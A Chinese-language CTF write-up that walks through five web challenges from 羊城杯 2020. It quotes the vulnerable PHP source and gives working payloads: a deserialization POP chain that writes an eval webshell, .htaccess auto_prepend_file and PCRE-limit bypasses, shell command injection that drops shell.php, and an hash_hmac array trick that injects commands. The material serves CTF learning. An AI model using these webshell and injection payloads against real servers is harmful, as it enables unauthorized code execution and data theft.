2020-12-10
1.4k
羊城杯2020 Web Writeup
当时没时间打,现在题目在GitHub上开源了,随便看看。
easycon
蚁剑连接一句话,下载bbbbbbbbb.txt文件,是一个少了头部分的base64编码的图片,加上头再转码
easyser
这题目说实在的,提示地太隐晦了,用不安全的协议读取ser.php文件,Fuzz半天发现是用http://127.0.0.1/star1.php
读取源码。
ser.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 <?php error_reporting(0 ); if ( $_SERVER['REMOTE_ADDR' ] == "127.0.0.1" ) { highlight_file(__FILE__ ); } $flag='{Trump_:"fake_news!"}' ; class GWHT { public $hero; public function __construct ( ) { $this ->hero = new Yasuo; } public function __toString ( ) { if (isset ($this ->hero)){ return $this ->hero->hasaki(); }else { return "You don't look very happy" ; } } } class Yongen { public $file; public $text; public function __construct ($file='' ,$text='' ) { $this -> file = $file; $this -> text = $text; } public function hasaki ( ) { $d = '<?php die("nononon");?>' ; $a= $d. $this ->text; @file_put_contents($this -> file,$a); } } class Yasuo { public function hasaki ( ) { return "I'm the best happy windy man" ; } }
POP链构造+绕过exit
1 2 3 4 5 6 7 8 9 10 11 12 13 14 <?php class GWHT { public $hero; } class Yongen { public $file = "php://filter/convert.base64-decode/resource=aaa.php" ; public $text = "aaaPD9waHAgZXZhbCgkX1BPU1Rbc10pOyAgPz4=" ; } $a = new GWHT; $a->hero = new Yongen; echo urlencode(serialize($a));
easyphp
代码审计
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 <?php $files = scandir('./' ); foreach ($files as $file) { if (is_file($file)){ if ($file !== "index.php" ) { unlink($file); } } } if (!isset ($_GET['content' ]) || !isset ($_GET['filename' ])) { highlight_file(__FILE__ ); die (); } $content = $_GET['content' ]; if (stristr($content,'on' ) || stristr($content,'html' ) || stristr($content,'type' ) || stristr($content,'flag' ) || stristr($content,'upload' ) || stristr($content,'file' )) { echo "Hacker" ; die (); } $filename = $_GET['filename' ]; if (preg_match("/[^a-z\.]/" , $filename) == 1 ) { echo "Hacker" ; die (); } $files = scandir('./' ); foreach ($files as $file) { if (is_file($file)){ if ($file !== "index.php" ) { unlink($file); } } } file_put_contents($filename, $content . "\nHello, world" ); ?>
第一反应就是覆盖掉index.php,但是好像没有写入权限,那大概率应该就是用.htaccess
这个文件做文章了。
第一种思路,向.htaccess
文件写入shell,并且用auto_prepend_file包含.htaccess
,但是file
关键字被ban了,可以用换行绕过,结尾要用\
处理content中的\n
。
1 ?filename=.htaccess&content=php_value%20auto_prepend_fil\%0ae%20.htaccess%0a%23<? php%20system('cat%20/fl[a]g');?>\
第二种思路,依然是利用.htaccess
文件特性,不过这次是通过设置php_value来设置preg_macth
正则回溯次数
1 2 php_value pcre.backtrack_limit 0 php_value pcre.jit 0
先写入.htaccess
1 ?content=php_value%20pcre.backtrack_limit%200%0aphp_value%20pcre.jit%200%0a%23\&f ilename=.htaccess
再直接通过php://filter
伪协议写入一句话:
1 ?filename=php://filter/write=convert.base64-decode/resource=.htaccess&content=cGhwX3ZhbHVlIHBjcmUuYmFja3RyYWNrX2xpbWl0IDAKcG hwX3ZhbHVlIHBjcmUuaml0IDAKcGhwX3ZhbHVlIGF1dG9fYXBwZW5kX2ZpbGUgLmh0YWNjZXNzCiM8P3 BocCBldmFsKCRfR0VUWzFdKTs/Plw&1=phpinfo();
easyphp2
robots.txt提示有check.php
伪协议读取源码:
https://www.php.net/manual/zh/filters.convert.php
1 http://localhost:8080/?file=php://filter/read=convert.quoted-printable-encode/resource=GWHT.php
GWHT.php
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 <!DOCTYPE html> <html lang="en" > <head> <meta charset="UTF-8" > <meta name="viewport" content="width=device-width, initial-scale=1.0" > <meta http-equiv="X-UA-Compatible" content="ie=edge" > <title>count is here</title> <style> html, body { overflow: none; max-height: 100 vh; } </style> </head> <body style="height: 100vh; text-align: center; background-color: green; color: blue; display: flex; flex-direction: column; justify-content: center;" > <center><img src="question.jpg" height="200" width="200" /> </center> <?php ini_set('max_execution_time' , 5 ); if ($_COOKIE['pass' ] !== getenv('PASS' )) { setcookie('pass' , 'PASS' ); die ('<h2>' .'<hacker>' .'<h2>' .'<br>' .'<h1>' .'404' .'<h1>' .'<br>' .'Sorry, only people from GWHT are allowed to access this website.' .'23333' ); } ?> <h1>A Counter is here, but it has someting wrong</h1> <form> <input type="hidden" value="GWHT.php" name="file" > <textarea style="border-radius: 1rem;" type="text" name="count" rows=10 cols=50 ></textarea><br /> <input type="submit" > </form> <?php if (isset ($_GET["count" ])) { $count = $_GET["count" ]; if (preg_match('/;|base64|rot13|base32|base16|<\?php|#/i' , $count)){ die ('hacker!' ); } echo "<h2>The Count is: " . exec('printf \'' . $count . '\' | wc -c' ) . "</h2>" ; } ?> </body> </html>
check.php
1 2 3 4 5 6 <?php $pass = "GWHT" ; echo "Here is nothing, isn't it ?" ;header('Location: /' );
读到Cookie是GWHT,接下来就是命令执行exec('printf \'' . $count . '\' | wc -c')
exec命令无回显,可以直接写入shell
1 1'| echo "<?=eval(\$_POST['shell'])?>" > shell.php ||'
另外base64还有一种绕过方式:%6%32
,%32
是2,拼接成%62
就是字母b
了。
BlackCat
首页提示你听歌,把MP3下载到本地,用010 Editor打开,文件末尾隐藏着PHP代码
copy下来放到sublime中审计:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 <?php if (empty ($_POST['Black-Cat-Sheriff' ]) || empty ($_POST['One-ear' ])){ die ('Ë£¡¾¹¸Ò²ÈÎÒÒ»Ö»¶úµÄβ°Í£¡' ); } $clandestine = getenv("clandestine" ); if (isset ($_POST['White-cat-monitor' ])) $clandestine = hash_hmac('sha256' , $_POST['White-cat-monitor' ], $clandestine); $hh = hash_hmac('sha256' , $_POST['One-ear' ], $clandestine); if ($hh !== $_POST['Black-Cat-Sheriff' ]){ die ('ÓÐÒâÃé×¼£¬ÎÞÒâ»÷·¢£¬ÄãµÄÃÎÏë¾ÍÊÇÄãÒªÃé×¼µÄÄ¿±ê¡£ÏàÐÅ×Ô¼º£¬Äã¾ÍÊÇÄÇ¿ÅÉäÖаÐÐĵÄ×Óµ¯¡£' ); } echo exec("nc" .$_POST['One-ear' ]);
中文存在乱码,不过不影响审计过程。hash_mac
在官方文档中的第一个Note提到了一个trick:
第二个参数如果是数组的话,那么这个函数会生成一个warning,并且返回NULL,那么相当于$clandetine
参数可控。payload:
1 White-cat-monitor[]=1&One-ear=;cat flag.php&Black-CatSheriff=04b13fc0dff07413856e54695eb6a763878cd1934c503784fe6e24b7e8cdb1b6